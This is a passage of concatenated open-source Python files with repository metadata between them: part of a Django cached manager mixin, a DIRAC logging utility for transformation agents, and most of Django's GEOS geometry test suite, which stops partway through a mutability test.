        """Override Django builtin"""
        super(CachedManagerMixin, self).contribute_to_class(model, name)
        # Defer signal hookup until the model class is fully prepared.
        class_prepared.connect(self.__class_prepared_cache, sender=model)

    def get_queryset(self):
        """Override Django builtin"""
        if self.__cache_enabled:
            return CachedQuerySet(self.model)
        else:
            return super(CachedManagerMixin, self).get_queryset()

    # Signals

    def __class_prepared_cache(self, sender, **kwargs):
        if self.__cache_enabled:
            # weak=False keeps the bound-method receivers alive for the
            # lifetime of the process.
            post_save.connect(self.__post_save_cache,
                              sender=self.model, weak=False)
            post_delete.connect(self.__post_delete_cache,
                                sender=self.model, weak=False)

    def __post_save_cache(self, instance, created, **kwargs):
        # Saves re-cache the fresh row; deletes (below) just drop it.
        self.invalidate(instance.pk, recache=True)

    def __post_delete_cache(self, instance, **kwargs):
        self.invalidate(instance.pk)
|
mit
|
wkrzemien/DIRAC
|
TransformationSystem/Agent/TransformationAgentsUtilities.py
|
7
|
3139
|
""" Utility Class for threaded agents (e.g. TransformationAgent)
Mostly for logging
"""
import time
from DIRAC import gLogger
__RCSID__ = "$Id$"
AGENT_NAME = ''
class TransformationAgentsUtilities(object):
  """ Logging utilities for threaded TS agents.

  Provides per-transformation log prefixes and task-name helpers.
  """

  def __init__(self):
    """ c'tor
    """
    self.transInThread = {}  # transID -> thread label
    self.debug = False       # when True, _logVerbose logs at info level

  def __threadForTrans(self, transID):
    """ Return the '[thread] [transID] AGENT_NAME.' log prefix. """
    try:
      return self.transInThread.get(transID, ' [None] [%s] ' % transID) + AGENT_NAME + '.'
    except NameError:
      # AGENT_NAME may be undefined in some import contexts
      return ''

  @staticmethod
  def __withTime(method, reftime):
    """ Append the elapsed time since reftime (if given) to the method label. """
    if reftime is not None:
      method += " (%.1f seconds)" % (time.time() - reftime)
    return method

  def _logVerbose(self, message, param='', method="execute", transID='None', reftime=None):
    """ verbose """
    method = self.__withTime(method, reftime)
    if self.debug:
      # Promote verbose messages to info when debugging, marked with (V)
      gLogger.info('(V) ' + self.__threadForTrans(transID) + method + ' ' + message, param)
    else:
      gLogger.verbose(self.__threadForTrans(transID) + method + ' ' + message, param)

  def _logDebug(self, message, param='', method="execute", transID='None', reftime=None):
    """ debug """
    method = self.__withTime(method, reftime)
    gLogger.debug(self.__threadForTrans(transID) + method + ' ' + message, param)

  def _logInfo(self, message, param='', method="execute", transID='None', reftime=None):
    """ info """
    method = self.__withTime(method, reftime)
    gLogger.info(self.__threadForTrans(transID) + method + ' ' + message, param)

  def _logWarn(self, message, param='', method="execute", transID='None', reftime=None):
    """ warn """
    method = self.__withTime(method, reftime)
    gLogger.warn(self.__threadForTrans(transID) + method + ' ' + message, param)

  def _logError(self, message, param='', method="execute", transID='None', reftime=None):
    """ error """
    method = self.__withTime(method, reftime)
    gLogger.error(self.__threadForTrans(transID) + method + ' ' + message, param)

  def _logException(self, message, param='', lException=False, method="execute", transID='None', reftime=None):
    """ exception """
    method = self.__withTime(method, reftime)
    gLogger.exception(self.__threadForTrans(transID) + method + ' ' + message, param, lException)

  def _logFatal(self, message, param='', method="execute", transID='None', reftime=None):
    """ fatal """
    method = self.__withTime(method, reftime)
    gLogger.fatal(self.__threadForTrans(transID) + method + ' ' + message, param)

  def _transTaskName(self, transID, taskID):  # pylint: disable=no-self-use
    """ Construct the task name from the transformation and task ID """
    return str(transID).zfill(8) + '_' + str(taskID).zfill(8)

  def _parseTaskName(self, taskName):  # pylint: disable=no-self-use
    """ Split a task name into (transID, taskID); (0, 0) for malformed names.

    BUGFIX: the previous implementation returned a *generator expression*,
    so int() was only evaluated when the caller consumed it -- outside this
    try/except -- making the ValueError fallback unreachable. Materializing
    the tuple here makes the error handling effective.
    """
    try:
      transID, taskID = taskName.split('_')
      return (int(transID), int(taskID))
    except ValueError:
      return (0, 0)
|
gpl-3.0
|
MounirMesselmeni/django
|
tests/gis_tests/geos_tests/test_geos.py
|
5
|
46748
|
from __future__ import unicode_literals
import ctypes
import json
import random
import unittest
from binascii import a2b_hex, b2a_hex
from io import BytesIO
from unittest import skipUnless
from django.contrib.gis import gdal
from django.contrib.gis.gdal import HAS_GDAL
from django.contrib.gis.geos import (
HAS_GEOS, GeometryCollection, GEOSException, GEOSGeometry, LinearRing,
LineString, MultiLineString, MultiPoint, MultiPolygon, Point, Polygon,
fromfile, fromstr,
)
from django.contrib.gis.geos.base import GEOSBase
from django.contrib.gis.shortcuts import numpy
from django.template import Context
from django.template.engine import Engine
from django.test import mock
from django.utils import six
from django.utils.encoding import force_bytes
from django.utils.six.moves import range
from ..test_data import TestDataMixin
@skipUnless(HAS_GEOS, "Geos is required.")
class GEOSTest(unittest.TestCase, TestDataMixin):
def test_base(self):
    "Tests out the GEOSBase class: ptr assignment, NULL access, type checks."
    # Testing out GEOSBase class, which provides a `ptr` property
    # that abstracts out access to underlying C pointers.
    class FakeGeom1(GEOSBase):
        pass

    # This one only accepts pointers to floats
    c_float_p = ctypes.POINTER(ctypes.c_float)

    class FakeGeom2(GEOSBase):
        ptr_type = c_float_p

    # Default ptr_type is `c_void_p`.
    fg1 = FakeGeom1()
    # Default ptr_type is C float pointer
    fg2 = FakeGeom2()

    # These assignments are OK -- None is allowed because
    # it's equivalent to the NULL pointer.
    fg1.ptr = ctypes.c_void_p()
    fg1.ptr = None
    fg2.ptr = c_float_p(ctypes.c_float(5.23))
    fg2.ptr = None

    # Because pointers have been set to NULL, an exception should be
    # raised when we try to access it. Raising an exception is
    # preferable to a segmentation fault that commonly occurs when
    # a C method is given a NULL memory reference.
    for fg in (fg1, fg2):
        # Equivalent to `fg.ptr`
        self.assertRaises(GEOSException, fg._get_ptr)

    # Anything that is either not None or the acceptable pointer type will
    # result in a TypeError when trying to assign it to the `ptr` property.
    # Thus, memory addresses (integers) and pointers of the incorrect type
    # (in `bad_ptrs`) will not be allowed.
    bad_ptrs = (5, ctypes.c_char_p(b'foobar'))
    for bad_ptr in bad_ptrs:
        # Equivalent to `fg.ptr = bad_ptr`
        self.assertRaises(TypeError, fg1._set_ptr, bad_ptr)
        self.assertRaises(TypeError, fg2._set_ptr, bad_ptr)
def test_wkt(self):
    "Testing WKT output."
    for g in self.geometries.wkt_out:
        geom = fromstr(g.wkt)
        # Only the 3D case is asserted here: for geometries with Z the
        # plain wkt output must match the expected EWKT form.
        if geom.hasz:
            self.assertEqual(g.ewkt, geom.wkt)
def test_hex(self):
    "Testing HEX output."
    for g in self.geometries.hex_wkt:
        geom = fromstr(g.wkt)
        # geom.hex is bytes; decode before comparing to the str fixture.
        self.assertEqual(g.hex, geom.hex.decode())
def test_hexewkb(self):
    "Testing (HEX)EWKB output against PostGIS-derived reference values."
    # For testing HEX(EWKB).
    ogc_hex = b'01010000000000000000000000000000000000F03F'
    ogc_hex_3d = b'01010000800000000000000000000000000000F03F0000000000000040'
    # `SELECT ST_AsHEXEWKB(ST_GeomFromText('POINT(0 1)', 4326));`
    hexewkb_2d = b'0101000020E61000000000000000000000000000000000F03F'
    # `SELECT ST_AsHEXEWKB(ST_GeomFromEWKT('SRID=4326;POINT(0 1 2)'));`
    hexewkb_3d = b'01010000A0E61000000000000000000000000000000000F03F0000000000000040'

    pnt_2d = Point(0, 1, srid=4326)
    pnt_3d = Point(0, 1, 2, srid=4326)

    # OGC-compliant HEX will not have SRID value.
    self.assertEqual(ogc_hex, pnt_2d.hex)
    self.assertEqual(ogc_hex_3d, pnt_3d.hex)

    # HEXEWKB should be appropriate for its dimension -- have to use an
    # a WKBWriter w/dimension set accordingly, else GEOS will insert
    # garbage into 3D coordinate if there is none.
    self.assertEqual(hexewkb_2d, pnt_2d.hexewkb)
    self.assertEqual(hexewkb_3d, pnt_3d.hexewkb)
    self.assertEqual(True, GEOSGeometry(hexewkb_3d).hasz)

    # Same for EWKB.
    self.assertEqual(six.memoryview(a2b_hex(hexewkb_2d)), pnt_2d.ewkb)
    self.assertEqual(six.memoryview(a2b_hex(hexewkb_3d)), pnt_3d.ewkb)

    # Redundant sanity check.
    self.assertEqual(4326, GEOSGeometry(hexewkb_2d).srid)
def test_kml(self):
    "Testing KML output."
    for tg in self.geometries.wkt_out:
        geom = fromstr(tg.wkt)
        # Not every fixture carries an expected KML string; skip those.
        kml = getattr(tg, 'kml', False)
        if kml:
            self.assertEqual(kml, geom.kml)
def test_errors(self):
    "Testing the Error handlers."
    # string-based
    for err in self.geometries.errors:
        with self.assertRaises((GEOSException, ValueError)):
            fromstr(err.wkt)

    # Bad WKB
    self.assertRaises(GEOSException, GEOSGeometry, six.memoryview(b'0'))

    class NotAGeometry(object):
        pass

    # Some other object -- not str/bytes/buffer -- must be rejected.
    self.assertRaises(TypeError, GEOSGeometry, NotAGeometry())
    # None
    self.assertRaises(TypeError, GEOSGeometry, None)
def test_wkb(self):
    "Testing WKB output."
    for g in self.geometries.hex_wkt:
        geom = fromstr(g.wkt)
        wkb = geom.wkb
        # Round-trip WKB back to hex and compare (fixture hex is uppercase).
        self.assertEqual(b2a_hex(wkb).decode().upper(), g.hex)
def test_create_hex(self):
    "Testing creation from HEX."
    for g in self.geometries.hex_wkt:
        geom_h = GEOSGeometry(g.hex)
        # we need to do this so decimal places get normalized
        geom_t = fromstr(g.wkt)
        self.assertEqual(geom_t.wkt, geom_h.wkt)
def test_create_wkb(self):
    "Testing creation from WKB."
    for g in self.geometries.hex_wkt:
        # Build a binary buffer from the fixture hex string.
        wkb = six.memoryview(a2b_hex(g.hex.encode()))
        geom_h = GEOSGeometry(wkb)
        # we need to do this so decimal places get normalized
        geom_t = fromstr(g.wkt)
        self.assertEqual(geom_t.wkt, geom_h.wkt)
def test_ewkt(self):
    "Testing EWKT: SRID prefix must propagate to geometry and its rings."
    srids = (-1, 32140)
    for srid in srids:
        for p in self.geometries.polygons:
            ewkt = 'SRID=%d;%s' % (srid, p.wkt)
            poly = fromstr(ewkt)
            self.assertEqual(srid, poly.srid)
            self.assertEqual(srid, poly.shell.srid)
            self.assertEqual(srid, fromstr(poly.ewkt).srid)  # Checking export
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_json(self):
    "Testing GeoJSON input/output (via GDAL)."
    for g in self.geometries.json_geoms:
        geom = GEOSGeometry(g.wkt)
        if not hasattr(g, 'not_equal'):
            # Loading jsons to prevent decimal differences
            self.assertEqual(json.loads(g.json), json.loads(geom.json))
            self.assertEqual(json.loads(g.json), json.loads(geom.geojson))
        # GeoJSON input must reconstruct the same geometry regardless.
        self.assertEqual(GEOSGeometry(g.wkt), GEOSGeometry(geom.json))
def test_fromfile(self):
    "Testing the fromfile() factory."
    ref_pnt = GEOSGeometry('POINT(5 23)')

    # Prepare one file-like object holding WKT and one holding WKB.
    wkt_f = BytesIO()
    wkt_f.write(force_bytes(ref_pnt.wkt))
    wkb_f = BytesIO()
    wkb_f.write(bytes(ref_pnt.wkb))

    # Other tests use `fromfile()` on string filenames so those
    # aren't tested here.
    for fh in (wkt_f, wkb_f):
        fh.seek(0)
        pnt = fromfile(fh)
        self.assertEqual(ref_pnt, pnt)
def test_eq(self):
    "Testing equivalence."
    p = fromstr('POINT(5 23)')
    # A geometry compares equal to its own WKT string.
    self.assertEqual(p, p.wkt)
    self.assertNotEqual(p, 'foo')
    ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
    self.assertEqual(ls, ls.wkt)
    self.assertNotEqual(p, 'bar')
    # Error shouldn't be raise on equivalence testing with
    # an invalid type.
    for g in (p, ls):
        self.assertNotEqual(g, None)
        self.assertNotEqual(g, {'foo': 'bar'})
        self.assertNotEqual(g, False)
def test_points(self):
    "Testing Point objects: parsing, accessors, constructors, mutation."
    prev = fromstr('POINT(0 0)')
    for p in self.geometries.points:
        # Creating the point from the WKT
        pnt = fromstr(p.wkt)
        self.assertEqual(pnt.geom_type, 'Point')
        self.assertEqual(pnt.geom_typeid, 0)
        self.assertEqual(pnt.dims, 0)
        self.assertEqual(p.x, pnt.x)
        self.assertEqual(p.y, pnt.y)
        self.assertEqual(pnt, fromstr(p.wkt))
        self.assertEqual(False, pnt == prev)  # Use assertEqual to test __eq__

        # Making sure that the point's X, Y components are what we expect
        self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
        self.assertAlmostEqual(p.y, pnt.tuple[1], 9)

        # Testing the third dimension, and getting the tuple arguments
        if hasattr(p, 'z'):
            self.assertEqual(True, pnt.hasz)
            self.assertEqual(p.z, pnt.z)
            # BUGFIX: this was `assertEqual(p.z, pnt.tuple[2], 9)` -- the
            # trailing 9 was silently taken as the failure *message*, not a
            # `places` argument. assertAlmostEqual (as used for x/y above)
            # is what was intended.
            self.assertAlmostEqual(p.z, pnt.tuple[2], 9)
            tup_args = (p.x, p.y, p.z)
            set_tup1 = (2.71, 3.14, 5.23)
            set_tup2 = (5.23, 2.71, 3.14)
        else:
            self.assertEqual(False, pnt.hasz)
            self.assertIsNone(pnt.z)
            tup_args = (p.x, p.y)
            set_tup1 = (2.71, 3.14)
            set_tup2 = (3.14, 2.71)

        # Centroid operation on point should be point itself
        self.assertEqual(p.centroid, pnt.centroid.tuple)

        # Now testing the different constructors
        pnt2 = Point(tup_args)  # e.g., Point((1, 2))
        pnt3 = Point(*tup_args)  # e.g., Point(1, 2)
        self.assertEqual(pnt, pnt2)
        self.assertEqual(pnt, pnt3)

        # Now testing setting the x and y
        pnt.y = 3.14
        pnt.x = 2.71
        self.assertEqual(3.14, pnt.y)
        self.assertEqual(2.71, pnt.x)

        # Setting via the tuple/coords property
        pnt.tuple = set_tup1
        self.assertEqual(set_tup1, pnt.tuple)
        pnt.coords = set_tup2
        self.assertEqual(set_tup2, pnt.coords)

        prev = pnt  # setting the previous geometry
def test_multipoints(self):
    "Testing MultiPoint objects."
    for mp in self.geometries.multipoints:
        mpnt = fromstr(mp.wkt)
        self.assertEqual(mpnt.geom_type, 'MultiPoint')
        self.assertEqual(mpnt.geom_typeid, 4)
        self.assertEqual(mpnt.dims, 0)

        self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
        self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)

        # Indexing past the end must raise, not segfault.
        self.assertRaises(IndexError, mpnt.__getitem__, len(mpnt))
        self.assertEqual(mp.centroid, mpnt.centroid.tuple)
        self.assertEqual(mp.coords, tuple(m.tuple for m in mpnt))
        # Each member must be a valid, non-empty Point.
        for p in mpnt:
            self.assertEqual(p.geom_type, 'Point')
            self.assertEqual(p.geom_typeid, 0)
            self.assertEqual(p.empty, False)
            self.assertEqual(p.valid, True)
def test_linestring(self):
    "Testing LineString objects."
    prev = fromstr('POINT(0 0)')
    for l in self.geometries.linestrings:
        ls = fromstr(l.wkt)
        self.assertEqual(ls.geom_type, 'LineString')
        self.assertEqual(ls.geom_typeid, 1)
        self.assertEqual(ls.dims, 1)
        self.assertEqual(ls.empty, False)
        self.assertEqual(ls.ring, False)
        # Optional fixture attributes: only assert when present.
        if hasattr(l, 'centroid'):
            self.assertEqual(l.centroid, ls.centroid.tuple)
        if hasattr(l, 'tup'):
            self.assertEqual(l.tup, ls.tuple)

        self.assertEqual(ls, fromstr(l.wkt))
        self.assertEqual(False, ls == prev)  # Use assertEqual to test __eq__
        self.assertRaises(IndexError, ls.__getitem__, len(ls))
        prev = ls

    # Creating a LineString from a tuple, list, and numpy array
    self.assertEqual(ls, LineString(ls.tuple))  # tuple
    self.assertEqual(ls, LineString(*ls.tuple))  # as individual arguments
    self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple]))  # as list
    # Point individual arguments
    self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt)
    if numpy:
        self.assertEqual(ls, LineString(numpy.array(ls.tuple)))  # as numpy array
def test_multilinestring(self):
    "Testing MultiLineString objects."
    prev = fromstr('POINT(0 0)')
    for l in self.geometries.multilinestrings:
        ml = fromstr(l.wkt)
        self.assertEqual(ml.geom_type, 'MultiLineString')
        self.assertEqual(ml.geom_typeid, 5)
        self.assertEqual(ml.dims, 1)

        self.assertAlmostEqual(l.centroid[0], ml.centroid.x, 9)
        self.assertAlmostEqual(l.centroid[1], ml.centroid.y, 9)

        self.assertEqual(ml, fromstr(l.wkt))
        self.assertEqual(False, ml == prev)  # Use assertEqual to test __eq__
        prev = ml

        for ls in ml:
            self.assertEqual(ls.geom_type, 'LineString')
            self.assertEqual(ls.geom_typeid, 1)
            self.assertEqual(ls.empty, False)

        self.assertRaises(IndexError, ml.__getitem__, len(ml))
        # Reconstruction from cloned members and from raw coordinate tuples.
        self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
        self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
def test_linearring(self):
    "Testing LinearRing objects."
    for rr in self.geometries.linearrings:
        lr = fromstr(rr.wkt)
        self.assertEqual(lr.geom_type, 'LinearRing')
        self.assertEqual(lr.geom_typeid, 2)
        self.assertEqual(lr.dims, 1)
        self.assertEqual(rr.n_p, len(lr))
        self.assertEqual(True, lr.valid)
        self.assertEqual(False, lr.empty)

    # Creating a LinearRing from a tuple, list, and numpy array
    self.assertEqual(lr, LinearRing(lr.tuple))
    self.assertEqual(lr, LinearRing(*lr.tuple))
    self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
    if numpy:
        self.assertEqual(lr, LinearRing(numpy.array(lr.tuple)))
def test_polygons_from_bbox(self):
    "Testing `from_bbox` class method."
    bbox = (-180, -90, 180, 90)
    p = Polygon.from_bbox(bbox)
    self.assertEqual(bbox, p.extent)

    # Testing numerical precision
    x = 3.14159265358979323
    bbox = (0, 0, 1, x)
    p = Polygon.from_bbox(bbox)
    y = p.extent[-1]
    # 13 decimal places must survive the bbox -> polygon -> extent round-trip.
    self.assertEqual(format(x, '.13f'), format(y, '.13f'))
def test_polygons(self):
    "Testing Polygon objects."
    prev = fromstr('POINT(0 0)')
    for p in self.geometries.polygons:
        # Creating the Polygon, testing its properties.
        poly = fromstr(p.wkt)
        self.assertEqual(poly.geom_type, 'Polygon')
        self.assertEqual(poly.geom_typeid, 3)
        self.assertEqual(poly.dims, 2)
        self.assertEqual(poly.empty, False)
        self.assertEqual(poly.ring, False)
        self.assertEqual(p.n_i, poly.num_interior_rings)
        self.assertEqual(p.n_i + 1, len(poly))  # Testing __len__
        self.assertEqual(p.n_p, poly.num_points)

        # Area & Centroid
        self.assertAlmostEqual(p.area, poly.area, 9)
        self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
        self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)

        # Testing the geometry equivalence
        self.assertEqual(poly, fromstr(p.wkt))
        # Should not be equal to previous geometry
        self.assertEqual(False, poly == prev)  # Use assertEqual to test __eq__
        self.assertNotEqual(poly, prev)  # Use assertNotEqual to test __ne__

        # Testing the exterior ring
        ring = poly.exterior_ring
        self.assertEqual(ring.geom_type, 'LinearRing')
        self.assertEqual(ring.geom_typeid, 2)
        if p.ext_ring_cs:
            self.assertEqual(p.ext_ring_cs, ring.tuple)
            self.assertEqual(p.ext_ring_cs, poly[0].tuple)  # Testing __getitem__

        # Testing __getitem__ and __setitem__ on invalid indices
        self.assertRaises(IndexError, poly.__getitem__, len(poly))
        self.assertRaises(IndexError, poly.__setitem__, len(poly), False)
        self.assertRaises(IndexError, poly.__getitem__, -1 * len(poly) - 1)

        # Testing __iter__
        for r in poly:
            self.assertEqual(r.geom_type, 'LinearRing')
            self.assertEqual(r.geom_typeid, 2)

        # Testing polygon construction.
        self.assertRaises(TypeError, Polygon, 0, [1, 2, 3])
        self.assertRaises(TypeError, Polygon, 'foo')

        # Polygon(shell, (hole1, ... holeN))
        rings = tuple(r for r in poly)
        self.assertEqual(poly, Polygon(rings[0], rings[1:]))

        # Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
        ring_tuples = tuple(r.tuple for r in poly)
        self.assertEqual(poly, Polygon(*ring_tuples))

        # Constructing with tuples of LinearRings.
        self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
        self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
def test_polygons_templates(self):
    # Accessing Polygon attributes in templates should work.
    # (Regression check: attribute access on geometries must not raise
    # inside the template engine.)
    engine = Engine()
    template = engine.from_string('{{ polygons.0.wkt }}')
    polygons = [fromstr(p.wkt) for p in self.geometries.multipolygons[:2]]
    content = template.render(Context({'polygons': polygons}))
    self.assertIn('MULTIPOLYGON (((100', content)
def test_polygon_comparison(self):
    # Polygon ordering comparisons (__gt__/__lt__) between distinct rings.
    p1 = Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
    p2 = Polygon(((0, 0), (0, 1), (1, 0), (0, 0)))
    self.assertGreater(p1, p2)
    self.assertLess(p2, p1)

    p3 = Polygon(((0, 0), (0, 1), (1, 1), (2, 0), (0, 0)))
    p4 = Polygon(((0, 0), (0, 1), (2, 2), (1, 0), (0, 0)))
    self.assertGreater(p4, p3)
    self.assertLess(p3, p4)
def test_multipolygons(self):
    "Testing MultiPolygon objects."
    fromstr('POINT (0 0)')
    for mp in self.geometries.multipolygons:
        mpoly = fromstr(mp.wkt)
        self.assertEqual(mpoly.geom_type, 'MultiPolygon')
        self.assertEqual(mpoly.geom_typeid, 6)
        self.assertEqual(mpoly.dims, 2)
        self.assertEqual(mp.valid, mpoly.valid)

        # Deeper checks only make sense for valid multipolygons.
        if mp.valid:
            self.assertEqual(mp.num_geom, mpoly.num_geom)
            self.assertEqual(mp.n_p, mpoly.num_coords)
            self.assertEqual(mp.num_geom, len(mpoly))
            self.assertRaises(IndexError, mpoly.__getitem__, len(mpoly))
            for p in mpoly:
                self.assertEqual(p.geom_type, 'Polygon')
                self.assertEqual(p.geom_typeid, 3)
                self.assertEqual(p.valid, True)
            self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
def test_memory_hijinks(self):
    "Testing Geometry __del__() on rings and polygons."
    # #### Memory issues with rings and poly

    # These tests are needed to ensure sanity with writable geometries.

    # Getting a polygon with interior rings, and pulling out the interior rings
    poly = fromstr(self.geometries.polygons[1].wkt)
    ring1 = poly[0]
    ring2 = poly[1]

    # These deletes should be 'harmless' since they are done on child geometries
    del ring1
    del ring2
    ring1 = poly[0]
    ring2 = poly[1]

    # Deleting the polygon
    del poly

    # Access to these rings is OK since they are clones.
    # (str() forces a WKT serialization, which would crash on a dangling
    # C pointer if the rings shared memory with the deleted polygon.)
    str(ring1)
    str(ring2)
def test_coord_seq(self):
    "Testing Coordinate Sequence objects."
    for p in self.geometries.polygons:
        if p.ext_ring_cs:
            # Constructing the polygon and getting the coordinate sequence
            poly = fromstr(p.wkt)
            cs = poly.exterior_ring.coord_seq

            self.assertEqual(p.ext_ring_cs, cs.tuple)  # done in the Polygon test too.
            self.assertEqual(len(p.ext_ring_cs), len(cs))  # Making sure __len__ works

            # Checks __getitem__ and __setitem__
            for i in range(len(p.ext_ring_cs)):
                c1 = p.ext_ring_cs[i]  # Expected value
                c2 = cs[i]  # Value from coordseq
                self.assertEqual(c1, c2)

                # Constructing the test value to set the coordinate sequence with
                if len(c1) == 2:
                    tset = (5, 23)
                else:
                    tset = (5, 23, 8)
                cs[i] = tset

                # Making sure every set point matches what we expect.
                # (A redundant `cs[i] = tset` re-assignment on every pass of
                # this inner loop was removed; the value is set once above.)
                for j in range(len(tset)):
                    self.assertEqual(tset[j], cs[i][j])
def test_relate_pattern(self):
    "Testing relate() and relate_pattern()."
    g = fromstr('POINT (0 0)')
    # A malformed DE-9IM pattern string must be rejected.
    self.assertRaises(GEOSException, g.relate_pattern, 0, 'invalid pattern, yo')
    for rg in self.geometries.relate_geoms:
        a = fromstr(rg.wkt_a)
        b = fromstr(rg.wkt_b)
        self.assertEqual(rg.result, a.relate_pattern(b, rg.pattern))
        self.assertEqual(rg.pattern, a.relate(b))
def test_intersection(self):
    "Testing intersects() and intersection()."
    for i in range(len(self.geometries.topology_geoms)):
        a = fromstr(self.geometries.topology_geoms[i].wkt_a)
        b = fromstr(self.geometries.topology_geoms[i].wkt_b)
        i1 = fromstr(self.geometries.intersect_geoms[i].wkt)
        self.assertEqual(True, a.intersects(b))
        i2 = a.intersection(b)
        self.assertEqual(i1, i2)
        self.assertEqual(i1, a & b)  # __and__ is intersection operator
        a &= b  # testing __iand__
        self.assertEqual(i1, a)
def test_union(self):
    "Testing union()."
    for i in range(len(self.geometries.topology_geoms)):
        a = fromstr(self.geometries.topology_geoms[i].wkt_a)
        b = fromstr(self.geometries.topology_geoms[i].wkt_b)
        u1 = fromstr(self.geometries.union_geoms[i].wkt)
        u2 = a.union(b)
        self.assertEqual(u1, u2)
        self.assertEqual(u1, a | b)  # __or__ is union operator
        a |= b  # testing __ior__
        self.assertEqual(u1, a)
def test_difference(self):
    "Testing difference()."
    for i in range(len(self.geometries.topology_geoms)):
        a = fromstr(self.geometries.topology_geoms[i].wkt_a)
        b = fromstr(self.geometries.topology_geoms[i].wkt_b)
        d1 = fromstr(self.geometries.diff_geoms[i].wkt)
        d2 = a.difference(b)
        self.assertEqual(d1, d2)
        self.assertEqual(d1, a - b)  # __sub__ is difference operator
        a -= b  # testing __isub__
        self.assertEqual(d1, a)
def test_symdifference(self):
    "Testing sym_difference()."
    for i in range(len(self.geometries.topology_geoms)):
        a = fromstr(self.geometries.topology_geoms[i].wkt_a)
        b = fromstr(self.geometries.topology_geoms[i].wkt_b)
        d1 = fromstr(self.geometries.sdiff_geoms[i].wkt)
        d2 = a.sym_difference(b)
        self.assertEqual(d1, d2)
        self.assertEqual(d1, a ^ b)  # __xor__ is symmetric difference operator
        a ^= b  # testing __ixor__
        self.assertEqual(d1, a)
def test_buffer(self):
    "Testing buffer()."
    for bg in self.geometries.buffer_geoms:
        g = fromstr(bg.wkt)

        # The buffer we expect
        exp_buf = fromstr(bg.buffer_wkt)
        quadsegs = bg.quadsegs
        width = bg.width

        # Can't use a floating-point for the number of quadsegs.
        self.assertRaises(ctypes.ArgumentError, g.buffer, width, float(quadsegs))

        # Constructing our buffer
        buf = g.buffer(width, quadsegs)
        self.assertEqual(exp_buf.num_coords, buf.num_coords)
        self.assertEqual(len(exp_buf), len(buf))

        # Now assuring that each point in the buffer is almost equal
        for j in range(len(exp_buf)):
            exp_ring = exp_buf[j]
            buf_ring = buf[j]
            self.assertEqual(len(exp_ring), len(buf_ring))
            for k in range(len(exp_ring)):
                # Asserting the X, Y of each point are almost equal (due to floating point imprecision)
                self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
                self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test_srid(self):
    "Testing the SRID property and keyword."
    # Testing SRID keyword on Point
    pnt = Point(5, 23, srid=4326)
    self.assertEqual(4326, pnt.srid)
    pnt.srid = 3084
    self.assertEqual(3084, pnt.srid)
    # SRID must be an integer; strings are rejected at the ctypes layer.
    self.assertRaises(ctypes.ArgumentError, pnt.set_srid, '4326')

    # Testing SRID keyword on fromstr(), and on Polygon rings.
    poly = fromstr(self.geometries.polygons[1].wkt, srid=4269)
    self.assertEqual(4269, poly.srid)
    for ring in poly:
        self.assertEqual(4269, ring.srid)
    poly.srid = 4326
    self.assertEqual(4326, poly.shell.srid)

    # Testing SRID keyword on GeometryCollection
    gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
    self.assertEqual(32021, gc.srid)
    for i in range(len(gc)):
        self.assertEqual(32021, gc[i].srid)

    # GEOS may get the SRID from HEXEWKB
    # 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
    # using `SELECT GeomFromText('POINT (5 23)', 4326);`.
    hex = '0101000020E610000000000000000014400000000000003740'
    p1 = fromstr(hex)
    self.assertEqual(4326, p1.srid)

    p2 = fromstr(p1.hex)
    self.assertIsNone(p2.srid)
    p3 = fromstr(p1.hex, srid=-1)  # -1 is intended.
    self.assertEqual(-1, p3.srid)

    # Testing that geometry SRID could be set to its own value
    pnt_wo_srid = Point(1, 1)
    pnt_wo_srid.srid = pnt_wo_srid.srid
@skipUnless(HAS_GDAL, "GDAL is required.")
def test_custom_srid(self):
    """Test with a null srid and a srid unknown to GDAL."""
    for srid in [None, 999999]:
        pnt = Point(111200, 220900, srid=srid)
        # EWKT only carries an 'SRID=...;' prefix when an SRID is set.
        self.assertTrue(pnt.ewkt.startswith(("SRID=%s;" % srid if srid else '') + "POINT (111200.0"))
        self.assertIsInstance(pnt.ogr, gdal.OGRGeometry)
        # GDAL cannot resolve a spatial reference for these SRIDs.
        self.assertIsNone(pnt.srs)

        # Test conversion from custom to a known srid
        c2w = gdal.CoordTransform(
            gdal.SpatialReference(
                '+proj=mill +lat_0=0 +lon_0=0 +x_0=0 +y_0=0 +R_A +ellps=WGS84 '
                '+datum=WGS84 +units=m +no_defs'
            ),
            gdal.SpatialReference(4326))
        new_pnt = pnt.transform(c2w, clone=True)
        self.assertEqual(new_pnt.srid, 4326)
        self.assertAlmostEqual(new_pnt.x, 1, 3)
        self.assertAlmostEqual(new_pnt.y, 2, 3)
def test_mutable_geometries(self):
    "Testing the mutability of Polygons and Geometry Collections."
    # ### Testing the mutability of Polygons ###
    for p in self.geometries.polygons:
        poly = fromstr(p.wkt)

        # Should only be able to use __setitem__ with LinearRing geometries.
        self.assertRaises(TypeError, poly.__setitem__, 0, LineString((1, 1), (2, 2)))

        # Constructing the new shell by adding 500 to every point in the old shell.
        shell_tup = poly.shell.tuple
        new_coords = []
        for point in shell_tup:
            new_coords.append((point[0] + 500., point[1] + 500.))
        new_shell = LinearRing(*tuple(new_coords))

        # Assigning polygon's exterior ring w/the new shell
        poly.exterior_ring = new_shell
